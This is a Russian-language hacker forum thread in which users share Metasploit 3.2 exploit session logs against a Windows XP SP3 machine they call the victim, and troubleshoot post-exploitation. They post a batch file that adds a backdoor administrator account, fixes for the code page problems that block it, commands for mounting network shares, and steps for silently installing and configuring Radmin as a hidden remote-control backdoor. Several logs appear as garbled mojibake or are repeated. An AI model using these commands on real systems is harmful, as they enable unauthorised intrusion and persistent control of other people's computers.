Started bind handler
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 3 - lang:Russian
Selected Target: Windows XP SP3 Russian (NX)
Triggering the vulnerability...
Command shell session 8 opened (10.1.0.91:35136 -> 10.1.0.38:4444)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

>> copy \\10.1.0.91\1\1.bat c:\

copy \\10.1.0.91\1\1.bat c:\
¥ ©¤¥ á¥â¥¢®© ¯ãâì.
__________________________________________________ _________________________
chcp1251 не работает

в общем как с этим боротсья подскажите плиз
изза этого я думаю, не создается учетка в группе Администраторы, иочнее учетка создается но не присоедитняется к группе

еще если кто может то подскажите как на удаленной машине скачивать файлы по сети(фтп просьба не предлагать) меня интересует синтаксис copy и xcopy

еще интересно как подключить сетевой диск на удаленной машине чтобы я копировал как с локального диска
вроде пока вопросов больше нет


если кто подскажет буду крайне благодарен, любой информации, а пока пойду гуглить

пс. находил все необходимые команды, но они потерялись, помню что они короткие (не более 10 символов на расшаривание диска с) причем оно реально работало, или подскажите как и где посмотреть логи MSF 3.2 запущенном на ubuntu.

C:\Users\Администратор>xcopy /?
Копирование файлов и структур каталогов.

Примечание: XCOPY считается устаревшей командой, вместо нее
рекомендуется использовать ROBOCOPY.

XCOPY источник [результат] [/A | /M] [/D[:дата]] [/P] [/S [/E]] [/V] [/W]
[/C] [/I] [/Q] [/F] [/L] [/G] [/H] [/R] [/T] [/U]
[/K] [/N] [/O] [/X] [/Y] [/-Y] [/Z] [/B]
[/EXCLUDE:файл1[+файл2][+файл3]...]

источник Копируемые файлы.
результат Местоположение и/или имена новых файлов.
/A Копирование только файлов с установленным архивным атрибутом.
Сам атрибут при этом не изменяется.
/M Копирование только файлов с установленным архивным атрибутом.
После копирования атрибут снимается.
/D:дата Копирование файлов, измененных не ранее указанной даты.
Если дата не указана, заменяются только конечные файлы,
более старые, чем исходные.
/EXCLUDE:файл1[+файл2][+файл3]...
Список файлов, содержащих строки. Каждая текстовая строка должна
располагаться в отдельной строке файла. Когда любая из строк
совпадает с любой частью абсолютного пути к копируемому файлу,
такой файл исключается из операции копирования. К примеру,
указав строку \obj\ или .obj можно исключить все файлы из
папки obj или все файлы с расширением obj соответственно.
/P Вывод запросов перед созданием каждого нового файла.
/S Копирование каталогов с подкаталогами (кроме пустых).
/E Копирование каталогов с подкаталогами (в том числе пустых).
Эквивалентен сочетанию ключей /S /E. Совместим с ключом /T.
/V Сравнение конечных файлов с исходными.
/W Вывод запроса на нажатие клавиши перед копированием.
/C Продолжение копирования, независимо от наличия ошибок.
/I Если результат не существует, а копируется несколько файлов,
считается, что указано имя каталога.
/Q Запрет вывода имен копируемых файлов.
/F Вывод полных имен исходных и конечных файлов.
/L Вывод имен копируемых файлов.
/G Копирование зашифрованных файлов в каталог результата, не
поддерживающий шифрование.
/H Копирование скрытых и системных файлов (среди прочих).
/R Разрешение замены файлов, предназначенных только для чтения.
/T Создание структуры каталогов (кроме пустых каталогов) без
копирования файлов. Если требуется создать пустые каталоги
и подкаталоги, используйте сочетание ключей /T /E.
/U Копирование только файлов, уже имеющихся в конечном каталоге.
/K Копирование атрибута "Только чтение" (обычно он сбрасывается).
/N Использование коротких имен при копировании.
/O Копирование сведений о владельце и данных ACL.
/X Копирование параметров аудита файлов (требует /O).
/Y Подавление запроса подтверждения на перезапись существующего
конечного файла.
/-Y Обязательный запрос подтверждения на перезапись существующего
конечного файла.
/Z Копирование сетевых файлов с возобновлением.
/B Копирование самой символической ссылки вместо копирования
целевого объекта этой ссылки

Ключ /Y можно установить через переменную среды COPYCMD.
Ключ /-Y командной строки переопределяет такую установку.
А ты у верен, что у жертвы стоит CP1251?
Попробуй запустить без параметров chcp

Сетевой диск монтируется коммандой subst

C:\Users\Администратор>subst /?
Сопоставление имени диска указанному пути.

SUBST [диск1: [диск2:]путь]
SUBST диск1: /D

диск1: Виртуальный диск, который сопоставляется указанному пути.
[диск:]путь Физические диск и путь,
которым сопоставляется виртуальный диск.
/D Удаление ранее созданного виртуального диска.

Введите SUBST без параметров для вывода текущего списка виртуальных дисков.

Попробуй запустить без параметров chcp


сетевой диск подключил, вопрос снят
.

что именно запустить и как
я юзаю
./msfweb
opera--http://127.0.0.1:55555/
___________________________________________--
вот что попробовал сделать
Command shell session 10 opened (10.1.0.91:56278 -> 10.1.0.38:4444)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

>> chcp

chcp
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 866


чте сделать дальше??
попробовал запустить батник с содержанием
net user adm 1234 /add
net localgroup Администраторы adm /add

и получил
>> 1.bat

1.bat

C:\>net user adm 1234 /add
Š®¬ ¤ ¢ë¯®«¥ ãᯥè®.


C:\>net localgroup Ð�дминиÑ�Ñ‚Ñ?атоÑ?Ñ‹ adm /add
‘¨á⥬ ï ®è¨¡ª 1376.

“ª § ï «®ª «ì ï £à㯯 ¥ áãé¥áâ¢ã¥â.
___________
запустил тотже батник на локальном компе и посмотрел что он мне ответит, ответ получил тот о котором и подозревал- "указанная локальная группа не существует "

ввел net localgroup Администраторы adm /add в цмд и получил ответ "Команда успешно выполнена"
вопрос о кодировке остается открытым

что именно запустить и как
я юзаю
./msfweb
opera--http://127.0.0.1:55555/
___________________________________________--
вот что попробовал сделать
Command shell session 10 opened (10.1.0.91:56278 -> 10.1.0.38:4444)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

>> chcp

chcp
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 866


чте сделать дальше
Текущая кодовая страница 866 (Dos), выполни в шеле
chcp 1251

P.S. Декодировал штирлицом кракозябры получилось:
dos->iso Win -> DOS (2064)

Текущая кодовая страница 866 (Dos), выполни в шеле
chcp 1251

P.S. Декодировал штирлицом кракозябры получилось:
dos->iso Win -> DOS (2064)

запустил в шеле (мсф консоле)
>> chcp 1251

chcp 1251
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 1251

C:\>

>> 1.bat

1.bat

C:\>net user adm 1234 /add
Š®¬ ¤ ¢ë¯®«¥ ãᯥè®.


C:\>net localgroup Администраторы adm /add
‘¨á⥬ ï ®è¨¡ª 1376.

“ª § ï «®ª «ì ï £à㯯 ¥ áãé¥áâ¢ã¥â.

в общем все завелось)) надо было немного голову включить))
шаг1
в щеле chcp 1251
в gedit сохранил батник с кодировкой windows-1251
ответ в щеле пришол кривой но команда отработала успешно))

запустил в шеле (мсф консоле)
>> chcp 1251

chcp 1251
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 1251

C:\>

>> 1.bat

1.bat

C:\>net user adm 1234 /add
Š®¬ ¤ ¢ë¯®«¥ ãᯥè®.


C:\>net localgroup Ð�дминиÑ�Ñ‚Ñ?атоÑ?Ñ‹ adm /add
‘¨á⥬ ï ®è¨¡ª 1376.

“ª § ï «®ª «ì ï £à㯯 ¥ áãé¥áâ¢ã¥â.
Теперь показывает WIN->DOS (3)
Где-то идёт перекодирование...

Первая комманда выполнена успешно.
Вторая комманда: Указанная локальная группа не существует.

ок тогда как сделать так чтобы я видел русские буквы ??
какая у меня кодировка в ubuntu 8.04 hardy ?
и я так понял надо в шеле выставить туже

и еще такой вопрос о радмине2.2
в шеле
1 скопировал в систем32 raddrv.dll и r_server.exe
2 r_server /install /port:4899 /pass:1234567890 /save
3 r_server /start

но чото както не рабоатет
запускаю радмин под вайном(на вайн не грешу ибо на тачки куда ставился радмин локально конектится нормально xD)
вот как бы я не игрался с /port радмин как висел на 4899 так и висит, в тасклист только после каждой операции с рсервером появляется новый процесс но нмап все равно говорит о открытом 4899 порте


где накосорезил ??
ах да забыл сказать что когда пытаюсь подключиться к серверу то пишет чтото про фильтрацию, но когда пытаюсь подключиться на другой порт то тупо"нельзя подключиться"

такую ситуацию я наблюдал когда пытался подключиться к машине с ненастроеным радмином(например сборка zver), то есть он какбы установлен и даже запущен но пока я его ручкеами не настрою( через его же графическую оболочку конфига) он работать отказывался и выдавал ту же самую ошибку

пс: на радмине не настаиваю но нужна прога для удаленного управления и чтобы устанавливалась с команднйо строки

это последний вопрос в данной теме

Сетевой диск монтируется коммандой subst
net use

в общем проблема было в том что на компах почемуто не работала настройка радмина из командной строки((
проблема решилась таким образом

на локальном компе
r_server.exe /setup
вбил ручками порт и пароль
ребут
экспортирвал ветку реестра в которой лежали все настройки радмина
удалил эту ветку
r_server.exe /stop
убил процес r_server.exe
удалил радмина со всеми осчтавшимися потрохами
ребут
скопировал радмина заново в папку систем32
скопировал туда рег фаил
запустил рег фаил
РЕБУТНУЛ КОМПЬЮТЕР
после ребута в реестре появилась ветка со всеми настройками радмина
подключился радминеом)))

был счастлив



всем спс кто пмомг
тему можно закрывать xD

net use
Угу, но и subst прокатывает, комманда ищё времён dos, на XP сопоставляет имя диска указанному пути (в том числе и сетевому).

subst Диск: \\ip_компа\Расшаренная_папка

Всё таки кто нибудь знает как поменять кодировку в Metasploit 3.2 чтоб в русской винде нормально отображались киррилические имена файлов и папок?

У меня он похоже вообще киррилицу не поддерживает (хотя помниться 2 версия метасплойта норм кириллицу отображал), при выводе отображает крякозябры, при вводе данных сессия виснет. :(

Господа, не могли бы объяснить новичку, как этим пользоваться? http://takeworld.blogspot.com/2008/11/metasploit-framework-2.html
И поможет ли это?

Господа, не могли бы объяснить новичку, как этим пользоваться? http://takeworld.blogspot.com/2008/11/metasploit-framework-2.html
И поможет ли это?

Неплохо было бы поюзать поиск:
http://forum.antichat.ru/threadnav89007-8-10.html

З.Ы. Вопрос из этойже оперы, кодировка нормально работает, но вот meterpreter сёравно не обучен кодировке. и при копировании в именах файлов места руских букв вопросы, приходица архивировать раром и потом заливать себе архив, что не есть эстетично ) нада гдето еще править. знающие люди подскажите хотяб в каком файле это фиксить.
Лебедь ты полюбому в курсе откликнись )) шоб этот вопрос для начинающих решили раз и навсегда

ну народ , не совсем удобно добавлять пользователей бат файлами ))) их же еще закинуть на удаленный хост надо, особых траблов с этим нет но всеже не удобно.
net user add xaker xD работает нормально а вот группа Administrators на рус виндах называется Администраторы и с добавлением пользователя 'хацкер' возникают проблемы ((


того кому надо распотрошить комп это не проблема, но мелкие неудобства всеже доставляет

кто нибудь нашел решение кодировки а то такая же хрень не могу добавить usera в Администраторы